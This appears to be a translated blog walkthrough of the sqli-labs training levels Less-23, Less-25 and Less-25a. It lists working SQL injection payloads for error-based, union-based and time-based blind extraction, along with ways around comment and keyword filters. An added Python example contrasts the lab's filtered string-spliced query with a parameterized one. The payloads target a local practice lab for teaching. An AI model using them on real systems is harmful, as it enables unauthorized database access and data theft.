LESS-23
Source code:
![screenshot](https://img-blog.csdnimg.cn/20190330211520492.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
![screenshot](https://img-blog.csdnimg.cn/2019033021153351.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
From this we can see that error-based injection and similar techniques are usable here.
Syntax:
`mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )`
Searches subject for matches of pattern and replaces them with replacement.
So every comment marker is replaced, which means a comment cannot be used to cut off whatever follows the quote. The only option is to add one more single quote that closes the trailing single quote.
![screenshot](https://img-blog.csdnimg.cn/20190330211605883.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
The error message also shows that id is enclosed in single quotes.
Input:
http://127.0.0.1/sqlilabs/Less-23/?id=1'and extractvalue(1,concat(0x7e,(select database()),0x7e)) or'1'='1
![screenshot](https://img-blog.csdnimg.cn/20190330211653100.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Explanation: "Subquery returns more than 1 row" means the subquery's result is not unique; it must return exactly one row to be valid. (The error here arises because concat cannot join a result of more than one row, so the error is raised inside concat before any limit is reached.)
Input:
http://127.0.0.1/sqlilabs/Less-23/?id=-1' and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" ),0x7e)) or '1'='1
![screenshot](https://img-blog.csdnimg.cn/20190330211711288.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Input:
http://127.0.0.1/sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security '),'3
Syntax: group_concat(str1,str2,…) joins all the strings in a group into a single row, separating each record with a comma. To use UNION, both SELECTs must return the same number of columns.
![screenshot](https://img-blog.csdnimg.cn/20190330211721740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Input:
http://127.0.0.1/sqlilabs/Less-23/?id=1' and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'),0x7e)) or'1'='1
![screenshot](https://img-blog.csdnimg.cn/20190330211741252.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Fix: add `limit 0,1` inside the subquery:
http://127.0.0.1/sqlilabs/Less-23/?id=1 'and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit%200,1),0x7e)) or'1'='1
![screenshot](https://img-blog.csdnimg.cn/20190330211752596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Another fix, using group_concat so the subquery returns a single row:
http://127.0.0.1/sqlilabs/Less-23/?id=1' and extractvalue (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))%20or%20%271%27=%271
![screenshot](https://img-blog.csdnimg.cn/20190330211842882.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
http://127.0.0.1/sqlilabs/Less-23/?id=1' and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e))or '1'='1
![screenshot](https://img-blog.csdnimg.cn/20190330211901919.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
LESS-25
Source code:
![screenshot](https://img-blog.csdnimg.cn/20190330211951972.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
![screenshot](https://img-blog.csdnimg.cn/20190330211958726.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
As the code shows, this level filters `or` and `and`; union statements can of course still be used.
Solutions
1) Case variation: Or, OR, oR
2) Encoding: hex, urlencode
3) Inline comments: `/*or*/`
4) Use operators instead: and = `&&`, or = `||` (but `&&` must be URL-encoded as `%26%26`, because in a URL `&` normally introduces the next parameter, and the web server treats whatever follows `&` as a separate parameter)
5) Doubling, e.g. `oorr`: after the filter removes one `or`, the other remains
Input: ?id=1' || extractvalue(1,concat(0x7e,(select database()),0x7e))--+
![screenshot](https://img-blog.csdnimg.cn/201903302120228.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Input:
http://127.0.0.1/sqlilabs/Less-25/?id=1' %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))--+
![screenshot](https://img-blog.csdnimg.cn/20190330212046954.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Input: ?id=-1' union select 1,(select database()),3--+
![screenshot](https://img-blog.csdnimg.cn/2019033021205585.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Input: http://127.0.0.1/sqlilabs/Less-25/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
Reason for the error: the `or` inside `information` was filtered out as well.
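As an added example (not from the original post or the sqli-labs project), covering both the Less-23 comment-stripping filter and the Less-25 keyword-stripping filter: the two filters are reimplemented in Python as assumed from the behaviour the post describes, the post's observations are reproduced (comment markers removed, `oorr` collapsing to `or`, `information_schema` mangled), and the lab's string-spliced query is placed beside a parameterized one. The table, its rows and the sqlite3 stand-in for MySQL are constructed; the contrast shows why the fix is binding the value as data, not a longer blacklist.

```python
import re
import sqlite3

# Blacklist filters assumed to mirror the lab's preg_replace calls (the post
# only shows them as screenshots). Less-23 deletes comment markers; Less-25
# deletes every "or" and "and" in one case-insensitive pass each.
def less23_filter(value: str) -> str:
    return re.sub(r"#|--", "", value)

def less25_filter(value: str) -> str:
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    return re.sub(r"and", "", value, flags=re.IGNORECASE)

def setup_db() -> sqlite3.Connection:
    # Constructed sample table standing in for the lab's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES(?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn

def lookup_concat(conn: sqlite3.Connection, raw_id: str) -> list:
    # The lab's pattern: filter, then splice the value into the SQL text.
    # The blacklist is the only "protection", and it is not a boundary.
    sql = (f"SELECT username FROM users WHERE id='{less25_filter(raw_id)}' "
           "ORDER BY id")
    return [r[0] for r in conn.execute(sql)]

def lookup_param(conn: sqlite3.Connection, raw_id: str) -> list:
    # Prepared statement: the same value is bound as data, so no keyword
    # or quote inside it can change the query's structure.
    sql = "SELECT username FROM users WHERE id=? ORDER BY id"
    return [r[0] for r in conn.execute(sql, (raw_id,))]

def demo() -> dict:
    conn = setup_db()
    payload = "-1' oorr '1'='1"   # the doubled keyword from the post
    return {
        "comment_stripped": less23_filter("1'#"),
        "oorr_survives": less25_filter(payload),
        "schema_name_broken": less25_filter("information_schema.tables"),
        "concat_rows": lookup_concat(conn, payload),  # every row leaks
        "param_rows": lookup_param(conn, payload),    # no row matches
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```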
LESS-25a
Unlike level 25, the SQL statement here does not wrap id in quotes, and no error output is shown, so error-based injection cannot be used. Otherwise it is essentially the same as level 25. Two approaches are used here: time-based injection and union injection.
![screenshot](https://img-blog.csdnimg.cn/20190330212218869.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Union injection:
http://127.0.0.1/sqlilabs/Less-25a/?id=-1 union select 1,(select database()),3--+
![screenshot](https://img-blog.csdnimg.cn/20190330212230151.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
Time-based injection:
http://127.0.0.1/sqlilabs/Less-25a/?id=-1 || if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
![screenshot](https://img-blog.csdnimg.cn/20190330212249400.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)